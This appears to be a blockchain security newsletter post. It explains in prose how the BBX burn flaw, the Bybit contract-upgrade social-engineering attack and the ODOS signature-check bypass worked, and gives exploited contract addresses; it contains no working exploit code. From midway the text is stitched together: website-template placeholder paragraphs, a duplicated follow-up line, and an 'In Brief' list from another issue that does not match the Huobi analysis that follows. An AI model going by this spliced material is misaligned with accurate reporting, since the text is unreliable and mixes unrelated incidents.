ByBit, ODOS, and BBX Hacked: $1.5B Drained via Social Engineering, Signature Bypass, and Burn Exploit
ByBit lost $1.5B after signers unknowingly approved a contract upgrade with hidden backdoors. ODOS Protocol suffered a $50K hit from a signature validation flaw using precompiled contracts. BBX’s flawed burn mechanism let an attacker spam zero-amount transfers, draining $12K through price manipulation.
In Brief
BBX lost $12K due to a burn mechanism flaw.
ByBit suffered a $1.5B loss due to a social engineering attack.
ODOS Protocol lost $50K due to an input validation vulnerability.
Hacks Analysis
BBX | Amount Lost: $12K
On March 20, the BBX exploit on the Binance Smart Chain resulted in a $12,000 loss due to a flaw in the _transfer() function. The attacker sent amount=0 transfers to trigger the burn mechanism, moving tokens from the liquidity pool to the 0xdead address. Each call reduced the pool’s supply and updated reserves via sync(), manipulating the price. The function’s time check, if (block.timestamp >= lastBurnTime + lastBurnGapTime), failed to stop same-block spamming since block.timestamp stays constant within a block. The attacker profited by artificially reducing the token supply and inflating the price.
Press enter or click to view image in full size
Exploited Contract (on BSC): 0x67ca347e7b9387af4e81c36cca4eaf080dcb33e9
On February 21, the Bybit exploit on the Ethereum Mainnet resulted in a $1.5B loss due to a social engineering attack. The exploit involved injecting malicious JavaScript into the UI and tricking signers into approving a routine transfer that hid a contract upgrade. The upgrade added backdoor functions, letting the attacker steal 401K ETH across 39 addresses.
Press enter or click to view image in full size
One of the exploiter contracts: 0x4571bd67d14280e40bf3910bd39fbf60834f900a
ODOS Protocol | Amount Lost: $50K
On January 23, 2025, the ODOS Protocol exploit on Base caused a $50K loss. The root cause of the exploit was an insufficient input validation in the OdosLimitOrderRouter’s isValidSigImpl() function. The code allowed deploying new contracts via create2Factory if the _signer’s code length was zero. The attacker used the 0x4 pre-compiled contract (zero length), to pass IERC1271Wallet.isValidSignature() and bypass the signature check. The attacker sent unverified factoryCalldata with an ERC20.transfer to steal tokens.
Press enter or click to view image in full size
Press enter or click to view image in full size
Exploited Contract (on Base): 0xb6333e994fd02a9255e794c177efbdeb1fe779c7
The rich text element allows you to create and format headings, paragraphs, blockquotes, images, and video all in one place instead of having to add and format them individually. Just double-click and easily create content.
A rich text element can be used with static or dynamic content. For static content, just drop it into any page and begin editing. For dynamic content, add a rich text field to any collection and then connect a rich text element to that field in the settings panel. Voila!
Headings, paragraphs, blockquotes, figures, images, and figure captions can all be styled after a class is added to the rich text element using the "When inside of" nested selector system.
Follow-up: Conduct a follow-up review to ensure that the remediation steps were effective and that the smart contract is now secure.
Follow-up: Conduct a follow-up review to ensure that the remediation steps were effective and that the smart contract is now secure.
In Brief
Remitano suffered a $2.7M loss due to a private key compromise.
GAMBL’s recommendation system was exploited.
DAppSocial lost $530K due to a logic vulnerability.
Rocketswap’s private keys were inadvertently deployed on the server.
Hacks
Hacks Analysis
Huobi | Amount Lost: $8M
On September 24th, the Huobi Global exploit on the Ethereum Mainnet resulted in a $8 million loss due to the compromise of private keys. The attacker executed the attack in a single transaction by sending 4,999 ETH to a malicious contract. The attacker then created a second malicious contract and transferred 1,001 ETH to this new contract. Huobi has since confirmed that they have identified the attacker and has extended an offer of a 5% white hat bounty reward if the funds are returned to the exchange.
